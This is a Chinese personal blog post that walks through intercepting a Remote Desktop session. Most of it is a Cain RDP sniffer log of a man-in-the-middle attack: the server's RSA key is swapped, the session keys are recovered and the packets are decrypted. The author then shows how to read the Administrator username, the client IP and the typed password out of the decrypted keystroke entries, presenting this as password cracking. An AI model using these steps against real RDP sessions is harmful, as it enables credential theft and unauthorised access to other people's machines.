辉克's Blog

创造机会的人是勇者;等待机会的人是愚者

远程桌面数据拦截

远程桌面数据拦截
首先用嗅探器嗅探
以下是一份嗅探来的文件
记录了远程连接桌面的所有过程
===========================================
=== Cain’s RDP sniffer generated file ===
===========================================
[RDP connection]
————–
Server address: 192.168.0.245
Client address: 192.168.14.147
————–
– RDP client version: RDPv5
– RDP server version: RDPv5
– RC4 Key size: 2 (128-bit)
– Encryption level: 2 (medium)
– Server_random length: 32 bytes
[Server_random]
0000 39 53 4c 85 d0 e3 1e dc c9 00 be e0 d2 59 0e 5c 9SL……….Y.\
0010 2b 99 ee 18 94 2c 26 b6 ed f2 b3 83 b4 86 57 78 +….,&…….Wx
– Flags: 0x1 (RDP4-style encryption)
– Found server RSA public key
– Server RSA key magic: 0x31415352 (RSA1)
– Server RSA modulus length + padding: 72 bytes
[Server RSA public key exponent (network byte order)]
0000 01 00 01 00 ….
[Server RSA public key modulus (network byte order)]
0000 95 1c 4c 31 84 53 99 54 80 df a1 c5 b3 be 0d 6e ..L1.S.T…….n
0010 77 4f 09 8a 0a 90 3a 1b 5a dd 86 03 6d ac d5 d3 wO….:.Z…m…
0020 19 34 59 eb ef 49 0a 23 48 33 14 b5 3a 79 24 6b .4Y..I.#H3..:y$k
0030 77 46 06 41 fa 98 a1 0d bd 77 c5 1e 94 19 07 d4 wF.A…..w……
– Generating man in the middle (mitm) RSA key pair…
– Replacing RSA server public key modulus in network packet…
[Mitm public key modulus (network byte order)]
0000 c3 5a 73 c1 0b 6a aa b9 eb 48 e6 f6 2f 96 dd 86 .Zs..j…H../…
0010 d9 51 3c ed 35 7f 3f 86 d9 e9 d9 a4 59 a2 51 8c .Q<.5.?…..Y.Q.
0020 07 1e 05 cd 7d 7f 82 85 3a 40 be 09 35 53 34 bb ….}…:@..5S4.
0030 d6 b8 48 7e e5 c4 14 a3 1d ce d9 f3 aa e0 a4 bd ..H~…………
– Calculating packet checksums…
– Found RSA key signature
[Server RSA key signature (network byte order)]
0000 e5 ea f3 0d bb 75 b3 9e 13 16 db 06 0f d4 e4 13 …..u……….
0010 6c 39 85 f6 38 e3 dd d9 21 1d 12 98 12 21 ae ae l9..8…!….!..
0020 83 3d 28 04 8c 55 c9 ba 73 9f bf 77 78 96 51 1f .=(..U..s..wx.Q.
0030 23 af c3 c2 da 95 19 b9 ba 00 86 f2 fe 37 a3 79 #…………7.y
0040 00 00 00 00 00 00 00 00 ……..
– Calculating MD5 hash of mitm public key…
[MD5 hash of mitm public key]
0000 27 c0 74 5b a8 b1 62 58 dd 07 77 7a 55 ba bb 25 ‘.t[..bX..wzU..%
– Calculating signature of mitm public key digest…
– Replacing RSA server public key signature in network packet…
[Mitm RSA key signature (network byte order)]
0000 9b 8f 76 2c 39 af 64 e6 58 1c 44 38 db 2d 85 c3 ..v,9.d.X.D8.-..
0010 c9 44 4c a3 cf 46 1f 51 ef e3 49 71 08 54 81 79 .DL..F.Q..Iq.T.y
0020 16 da f7 40 ef 94 aa b0 c0 13 63 43 46 e5 e9 49 …@……cCF..I
0030 b6 57 b3 b0 6b 61 51 f9 b6 9a 57 43 b1 be c8 3d .W..kaQ…WC…=
– Calculating packet checksums…
– Encrypted client_random length + padding: 72 bytes
[Encrypted client_random (network byte order)]
0000 05 a6 99 bc 32 0e b4 3a 45 b6 88 0d 98 b5 8f ef ….2..:E…….
0010 c5 44 2c 9f 43 50 04 95 35 2b 51 19 04 4f fc 4c .D,.CP..5+Q..O.L
0020 19 33 48 71 fc 19 f2 39 d3 84 0f 3e b7 e5 19 c2 .3Hq…9…>….
0030 5c ee 68 ab 41 4d ec 9f 0a 2b 47 a5 55 77 c7 11 \.h.AM…+G.Uw..
– Decrypting client_random using mitm private key…
[Decrypted client_random]
0000 dc 55 4c 79 6e ba 25 f9 cd 9a 12 69 c6 4d 49 ba .ULyn.%….i.MI.
0010 0c 0f 57 fb 86 86 2e 26 3d e7 d5 c8 19 8b bc 65 ..W….&=……e
– Preparing mitm client_random using server public key…
– Replacing client_random in network packet to the server…
[Mitm encrypted client_random (network byte order)]
0000 55 1a d4 aa fd db da e2 7e fe 6d 91 1a 96 27 c8 U…….~.m…’.
0010 b6 5f 9a 12 2c 7c 6b c5 6d 8d 3c 60 ca 7c 4c 05 ._..,|k.m.<`.|L.
0020 51 fd 45 2a d9 96 94 a2 6c fd 33 83 a6 ad 1c 91 Q.E*….l.3…..
0030 ac a9 73 12 b7 8e ef 56 fb 73 79 23 cc a1 65 89 ..s….V.sy#..e.
– Calculating packet checksums…
– Generating RC4 encryption/decryption keys…
– RC4 key entropy: 128-bit
***************************************
– Symmetric encryption phase reached…
***************************************
[Client packet added to stream] – 393 bytes
0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 …….d….p.zH
0010 00 00 00 e6 ce 1d de f6 93 b2 b0 5e ff 99 63 23 ………..^..c#
0020 5f f5 b5 3e e8 82 6b 45 3d 1a d5 09 4f cb e5 02 _..>..kE=…O…
0030 d0 bb 32 85 0d b5 90 6e 70 ab d8 90 5f 88 80 d3 ..2….np…_…
0040 bc e2 a0 ec 87 13 97 67 93 72 c7 38 67 54 67 3c …….g.r.8gTg<
0050 cd d2 8c 20 e2 cf da f8 ff 60 aa bb db 49 2a 91 … …..`…I*.
0060 66 a9 4c 90 f6 e9 29 3d b2 1f cb 9d db a8 0a 01 f.L…)=……..
0070 d9 10 3e 94 6c ea 07 1c 26 39 b5 c7 a5 d0 e5 e6 ..>.l…&9……
0080 1d 7e ed ac e7 3a 82 6c 33 25 d9 81 ae 5f 3b a0 .~…:.l3%…_;.
0090 4b c6 47 d3 19 cb 0e eb a8 52 2b 87 30 1a 7d 88 K.G……R+.0.}.
00a0 a1 88 0c 1b 9a 9e 13 eb 7c e2 cf 29 89 7d 7e 59 ……..|..).}~Y
00b0 42 dd 39 f5 94 46 d9 59 d5 b9 a8 40 5b 12 d0 ab B.9..F.Y…@[…
00c0 62 dc ef 81 31 6f 8f 0c f9 1d 50 bf e3 8f 3b 2e b…1o….P…;.
00d0 02 d8 14 cc 09 b1 f8 90 22 8d b2 79 66 db 8a ce ……..”..yf…
00e0 60 96 83 ac b5 18 25 bc 28 db fc 2a a0 8d a2 e3 `…..%.(..*….
00f0 ec 3b 73 3a a4 9c 71 74 af 2b 22 86 8c 2b f7 04 .;s:..qt.+”..+..
0100 01 b0 a9 ba f6 fc 70 8a f6 29 af 05 50 2c 0d 41 ……p..)..P,.A
0110 58 38 9f fc d7 35 cf d1 24 15 1a 2e c8 92 25 a7 X8…5..$…..%.
0120 80 f5 b5 50 de 10 c1 32 7d a5 90 1e 26 1f 29 59 …P…2}…&.)Y
0130 7e 0e fd dd 4b 7e f0 0b ad 4a b3 83 e6 fa ce 0c ~…K~…J……
0140 b9 ba ab 66 8a 7d 36 1a 1f 83 c9 37 1c 51 af 6f …f.}6….7.Q.o
0150 05 8e a9 75 60 d1 43 c1 ab 23 7c 0c e8 4a 50 1a …u`.C..#|..JP.
0160 96 ce 69 9a 83 73 b7 ea da 8e 49 19 65 4a 1a cc ..i..s….I.eJ..
0170 99 38 81 65 25 26 27 7c f6 5c 93 bd 9b 15 ab 91 .8.e%&’|.\……
0180 b3 f9 d3 23 87 58 30 4a 84 …#.X0J.
[Client decrypted packet] – 393 bytes total; 366 bytes decrypted
0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 …….d….p.zH
0010 00 00 00 e6 ce 1d de f6 93 b2 b0 04 08 04 08 b3 …………….
0020 43 00 00 1e 00 1a 00 00 00 00 00 00 00 53 00 45 C…………S.E
0030 00 53 00 53 00 49 00 4f 00 4e 00 2d 00 44 00 38 .S.S.I.O.N.-.D.8
0040 00 36 00 42 00 43 00 35 00 34 00 00 00 41 00 64 .6.B.C.5.4…A.d
0050 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 .m.i.n.i.s.t.r.a
0060 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 00 02 .t.o.r……….
0070 00 1e 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 …1.9.2…1.6.8
0080 00 2e 00 31 00 34 00 2e 00 31 00 34 00 37 00 00 …1.4…1.4.7..
0090 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\.W.I.N.D
00a0 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\.s.y.s.t
00b0 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\.m.s.t
00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x…d.l.l
00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 … …-N.V.h.Q.
00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e……………
00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 ………..-N.V.
0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e………..
0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0180 00 00 00 07 00 00 00 00 00 ………
[Server packet added to stream] – 42 bytes
0000 03 00 00 2a 02 f0 80 68 00 01 03 eb 70 1c 88 02 …*…h….p…
0010 02 03 76 3e 10 e0 d0 e8 b3 84 e2 a2 61 d6 98 56 ..v>……..a..V
0020 ce b7 27 89 4d d3 bb 33 1a 56 ..’.M..3.V
中间内容省略、。。。。。。。
[Server packet added to stream] – 55 bytes
0000 c0 37 00 4e 0f 35 7e bf 3a 2d 8d a6 0b 0b 25 2c .7.N.5~.:-….%,
0010 30 52 02 27 cb 03 02 77 9d 70 45 f9 66 fa 6e 5a 0R.’…w.pE.f.nZ
0020 a5 b1 03 36 d4 95 3e 77 05 16 f9 c4 49 11 a4 d5 …6..>w….I…
0030 61 3f 1a 89 45 1a ae a?..E..
[Server decrypted packet] – 55 bytes total; 45 bytes decrypted
0000 c0 37 00 4e 0f 35 7e bf 3a 2d 80 00 25 00 03 00 .7.N.5~.:-..%…
0010 91 09 13 f8 6f ff ff 00 94 01 20 01 a0 01 2c 01 ….o….. …,.
0020 93 01 20 01 80 02 2c 01 2a 01 04 44 00 44 06 59 .. …,.*..D.D.Y
0030 01 01 06 85 00 00 00 …….
[Client packet added to stream] – 12 bytes
0000 c4 0c c7 1d f5 62 0b 75 25 90 9e 13 …..b.u%…
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c c7 1d f5 62 0b 75 25 90 01 18 …..b.u%…
Key released client-side: 0x18 – ‘o’
[Client packet added to stream] – 12 bytes
0000 c4 0c ee 11 b1 37 8f 69 7e 3a 2f e0 …..7.i~:/.
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c ee 11 b1 37 8f 69 7e 3a 00 31 …..7.i~:.1
Key pressed client-side: 0x31 – ‘n’
[Server packet added to stream] – 36 bytes
0000 c0 24 39 56 f4 ee 38 c2 6a 9e 6f 3e 1e c0 94 4e .$9V..8.j.o>…N
0010 eb 01 3f 41 83 78 5a b8 b5 a4 2f d8 a0 5c d6 48 ..?A.xZ…/..\.H
0020 b9 f9 50 6a ..Pj
[Server decrypted packet] – 36 bytes total; 26 bytes decrypted
0000 c0 24 39 56 f4 ee 38 c2 6a 9e 80 00 16 00 03 00 .$9V..8.j…….
0010 91 19 13 40 40 06 09 44 00 44 06 44 06 ff 04 06 …@@..D.D.D….
0020 59 01 01 06 Y…
[Client packet added to stream] – 12 bytes
0000 c4 0c f6 30 65 79 3f 40 9c 25 ed 92 …0ey?@.%..
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c f6 30 65 79 3f 40 9c 25 01 31 …0ey?@.%.1
Key released client-side: 0x31 – ‘n’
[Client packet added to stream] – 12 bytes
0000 c4 0c f9 a1 54 47 ec f5 d0 2e 0e e7 ….TG……
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c f9 a1 54 47 ec f5 d0 2e 00 20 ….TG…..
Key pressed client-side: 0x20 – ‘d’
[Server packet added to stream] – 38 bytes
0000 c0 26 b1 22 9b 71 78 78 6c 49 b4 39 46 8d 83 2f .&.”.qxxlI.9F../
0010 da 68 ae 2a 0c 99 ba 4b 39 42 86 06 ee 69 b9 2d .h.*…K9B…i.-
0020 a0 9a f2 01 23 a7 ….#.
[Server decrypted packet] – 38 bytes total; 28 bytes decrypted
0000 c0 26 b1 22 9b 71 78 78 6c 49 80 00 18 00 03 00 .&.”.qxxlI……
0010 91 19 13 40 40 06 0b 44 00 44 06 44 06 44 06 ff …@@..D.D.D.D..
0020 05 08 59 01 01 06 ..Y…
[Client packet added to stream] – 12 bytes
0000 c4 0c bd ee 83 de fb 6b f2 57 88 31 …….k.W.1
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c bd ee 83 de fb 6b f2 57 01 20 …….k.W.
Key released client-side: 0x20 – ‘d’
[Client packet added to stream] – 12 bytes
0000 c4 0c 54 de 4e 78 d8 7e 1e d6 95 4b ..T.Nx.~…K
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c 54 de 4e 78 d8 7e 1e d6 00 12 ..T.Nx.~….
Key pressed client-side: 0x12 – ‘e’
[Server packet added to stream] – 40 bytes
0000 c0 28 73 bb a5 7e db de 10 74 ba 33 86 df 79 d2 .(s..~…t.3..y.
0010 d2 54 2b 33 74 17 70 ae e5 48 aa 05 4c c3 b5 0a .T+3t.p..H..L…
0020 d1 8a cb 08 50 c7 fc 91 ….P…
[Server decrypted packet] – 40 bytes total; 30 bytes decrypted
0000 c0 28 73 bb a5 7e db de 10 74 80 00 1a 00 03 00 .(s..~…t……
0010 91 19 13 40 40 06 0d 44 00 44 06 44 06 44 06 44 …@@..D.D.D.D.D
0020 06 ff 06 0a 59 01 01 06 ….Y…
[Client packet added to stream] – 12 bytes
0000 c4 0c d0 c7 4a 09 30 e7 c8 07 16 69 ….J.0….i
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c d0 c7 4a 09 30 e7 c8 07 01 12 ….J.0…..
Key released client-side: 0x12 – ‘e’
[Client packet added to stream] – 12 bytes
0000 c4 0c 25 9d 2c 4a e2 af e3 07 1d cd ..%.,J……
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c 25 9d 2c 4a e2 af e3 07 00 2d ..%.,J…..-
Key pressed client-side: 0x2d – ‘x’
[Server packet added to stream] – 42 bytes
0000 c0 2a 08 7e a3 a1 f2 c8 3a 08 d9 97 6a 21 af e5 .*.~….:…j!..
0010 e9 af d0 db ed 6e 62 ca 33 14 6c b6 e7 cb 13 51 …..nb.3.l….Q
0020 83 e5 c7 10 b4 6e da 1d 12 69 …..n…i
[Server decrypted packet] – 42 bytes total; 32 bytes decrypted
0000 c0 2a 08 7e a3 a1 f2 c8 3a 08 80 00 1c 00 03 00 .*.~….:…….
0010 91 19 13 40 40 06 0f 44 00 44 06 44 06 44 06 44 …@@..D.D.D.D.D
0020 06 44 06 ff 07 0c 59 01 01 06 .D….Y…
[Client packet added to stream] – 12 bytes
0000 c4 0c dd 64 2e 22 43 e9 7f 8a b9 68 …d.”C….h
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c dd 64 2e 22 43 e9 7f 8a 01 2d …d.”C….-
Key released client-side: 0x2d – ‘x’
[Client packet added to stream] – 12 bytes
0000 c4 0c 5a f4 9c 8c b6 e3 34 9f db c3 ..Z…..4…
[Client decrypted packet] – 12 bytes total; 2 bytes decrypted
0000 c4 0c 5a f4 9c 8c b6 e3 34 9f 00 1c ..Z…..4…
Key pressed client-side: 0x1c – ‘enter’
以下内容省略。。。。。。
下面是选出有用的信息
实现密码破解
以下这段 记录了帐户名和ip地址等
[Client decrypted packet] – 393 bytes total; 366 bytes decrypted
0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 …….d….p.zH
0010 00 00 00 e6 ce 1d de f6 93 b2 b0 04 08 04 08 b3 …………….
0020 43 00 00 1e 00 1a 00 00 00 00 00 00 00 53 00 45 C…………S.E
0030 00 53 00 53 00 49 00 4f 00 4e 00 2d 00 44 00 38 .S.S.I.O.N.-.D.8
0040 00 36 00 42 00 43 00 35 00 34 00 00 00 41 00 64 .6.B.C.5.4…A.d
0050 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 00 61 .m.i.n.i.s.t.r.a
0060 00 74 00 6f 00 72 00 00 00 00 00 00 00 00 00 02 .t.o.r……….
0070 00 1e 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 …1.9.2…1.6.8
0080 00 2e 00 31 00 34 00 2e 00 31 00 34 00 37 00 00 …1.4…1.4.7..
0090 00 40 00 43 00 3a 00 5c 00 57 00 49 00 4e 00 44 .@.C.:.\.W.I.N.D
00a0 00 4f 00 57 00 53 00 5c 00 73 00 79 00 73 00 74 .O.W.S.\.s.y.s.t
00b0 00 65 00 6d 00 33 00 32 00 5c 00 6d 00 73 00 74 .e.m.3.2.\.m.s.t
00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x…d.l.l
00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 … …-N.V.h.Q.
00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e……………
00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 ………..-N.V.
0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e………..
0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
0180 00 00 00 07 00 00 00 00 00
以上的内容中 可以看出用户名是Administrator
Ip地址是192.168.14.147
然后接着是如何查看密码
搜索Key pressed
可以得知别人登陆时敲击的键盘 TA有可能输错密码
搜索Key released可以知道最后接收的密码
不停的按搜索 它会一个一个的字母帮你解析出来 哈哈 成功
这里得出的结果就是ondex用

发表回复